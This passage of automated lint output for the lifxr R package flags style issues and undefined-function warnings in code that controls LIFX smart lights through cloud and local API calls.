^\n```\n[R/lifx-cloud.R:162:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L162) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' a number between 0 and 360, whereas saturation and brightness should be between 0 and 1.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:163:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L163) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:165:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L165) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"green\", \"label:desk\")   # deep green, brightness untouched on lights labeled 'desk'\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:168:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L168) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"random\")                # random hue, maximum saturation, brightness untouched\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:176:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:177:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L177) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:180:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L180) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:185:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L185) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:187:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L187) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param from_color Same syntax as color, defaults to current color (of first bulb in selection)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:190:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L190) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param persist should the color persist after the effect? default is FALSE (returns to original color)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:197:65:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​breathe <- function(color, from_color = current_color(selector), \n                                                                ^\n```\n[R/lifx-cloud.R:200:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L200) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:208:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L208) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/breathe\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:210:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L210) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:214:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L214) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:217:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param duty_cycle Ratio of the period where color is active. Only used for pulse. Defaults to 0.5. Range: 0-1\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:220:68:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​pulse <- function(color, from_color = current_color(selector)[[1]], \n                                                                   ^\n```\n[R/lifx-cloud.R:223:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L223) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:231:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L231) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/pulse.json\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:233:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L233) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:237:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L237) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:244:71:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L244) *style:* **Trailing whitespace is superfluous.**\n```r\n​  PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/label.json\"), \n                                                                      ^\n```\n[R/lifx-cloud.R:245:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L245) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(label = label, \n                                 ^\n```\n[R/lifx-cloud.R:250:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L250) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:258:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:258:94:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n                                                                                             ^\n```\n[R/lifx-cloud.R:259:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L259) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(state = state, \n                                 ^\n```\n[R/lifx-cloud.R:260:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L260) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:262:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L262) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:266:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L266) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:272:24:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L272) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​    jsonlite::fromJSON(content(results, as = \"text\"))\n                       ^~~~~~~\n```\n[R/lifx-cloud.R:281:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L281) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return hsbk information for the string. \n                                           ^\n```\n[R/lifx-cloud.R:284:55:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L284) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- GET(paste0(BASE, \"/\", VERSION, \"/color\"), \n                                                      ^\n```\n[R/lifx-cloud.R:287:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L287) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:291:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L291) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:293:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L293) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power either on or off, defaults to on, makes not sense to shut the light off and change the color\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:299:66:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L299) *style:* **Trailing whitespace is superfluous.**\n```r\n​set_state <- function(selector =\"all\", power = \"on\", color= NULL, \n                                                                 ^\n```\n[R/lifx-cloud.R:302:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n      ^\n```\n[R/lifx-cloud.R:302:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                            ^\n```\n[R/lifx-cloud.R:302:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *warning:* **no visible global function definition for ‘check_brightness’**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:302:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                                                       ^\n```\n[R/lifx-cloud.R:303:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n      ^\n```\n[R/lifx-cloud.R:303:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                            ^\n```\n[R/lifx-cloud.R:303:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *warning:* **no visible global function definition for ‘check_saturation’**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:303:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                                                       ^\n```\n[R/lifx-cloud.R:304:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Lines should not be more than 80 characters.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:304:6:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Commented code should be removed.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Lines should not be more than 80 characters.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:83:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Trailing whitespace is superfluous.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                  ^\n```\n[R/lifx-cloud.R:307:37:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L307) *style:* **Put spaces around all infix operators.**\n```r\n​                               color= color,\n                                   ~^\n```\n[R/lifx-cloud.R:310:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L310) *style:* **Lines should not be more than 80 characters.**\n```r\n​                               saturation = saturation, # doesn't work. because needs to be in color.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:315:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L315) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-cloud.R:316:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L316) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-server.R:1:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L1) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These functions are designed to work with a local server only, which must be running separately\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:84:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n                                                                                   ^\n```\n[R/lifx-server.R:3:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:5:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L5) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(\"http://localhost:56780/lights.json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:7:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L7) *style:* **Commented code should be removed.**\n```r\n​#     message(\"LIFX server could not be reached\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:9:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L9) *style:* **Commented code should be removed.**\n```r\n​#     message(\"ping! LIFX server is active.\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:11:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L11) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:13:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L13) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(paste0(\"http://localhost:56780/lights/\", selector))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:14:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L14) *style:* **Commented code should be removed.**\n```r\n​#   dat <- RJSONIO::fromJSON(content(results, as=\"text\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:16:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:17:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:19:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L19) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/on\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:21:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:23:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L23) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/off\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:25:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:26:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:28:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:28:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:30:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:31:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L31) *style:* **Lines should not be more than 80 characters.**\n```r\n​# server_color <- function(selector=\"all\", hue, saturation=1, brightness=1, duration=1){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Commented code should be removed.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:35:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:36:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L36) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to green, then restore previous setting\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:39:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:41:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L41) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of 